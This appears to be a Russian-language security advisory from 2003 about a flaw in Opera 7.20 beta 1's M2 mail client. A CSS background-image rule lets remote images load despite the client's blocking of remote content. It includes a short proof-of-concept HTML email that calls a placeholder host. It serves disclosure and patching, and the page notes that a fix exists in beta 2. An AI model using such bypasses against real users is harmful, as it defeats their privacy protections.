Обход ограничений на просмотр внедренных объектов в почтовом клиенте M2 в Opera

Дата публикации:
28.07.2003
Всего просмотров:
1205
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Уязвимость обнаружена в почтовом клиенте M2 в Opera. Удаленный пользователь может сконструировать HTML, чтобы обойти ограничения клиента на внедренном удаленном объекте.

Сascading style sheet (CSS) могут использоваться для обхода ограничений на просмотр внедренных изображений, расположенных на удаленном сервере. Пример:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" 
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<style type="text/css">
omf|headers { background-image: url(http://[target]/t.png) }
</style>
</head>
<body>
{ Normal mail body here }
</body>
</html>
Уязвимость обнаружена в Opera 7.20 Beta 1, build 2981 only

Уязвимость устранена в Opera 7.20 beta 2, которую можно скачать отсюда:

http://www.opera.com/download/

Ссылки: Vulnerability in the mail client in Opera 7.20 beta 1.

или введите имя

CAPTCHA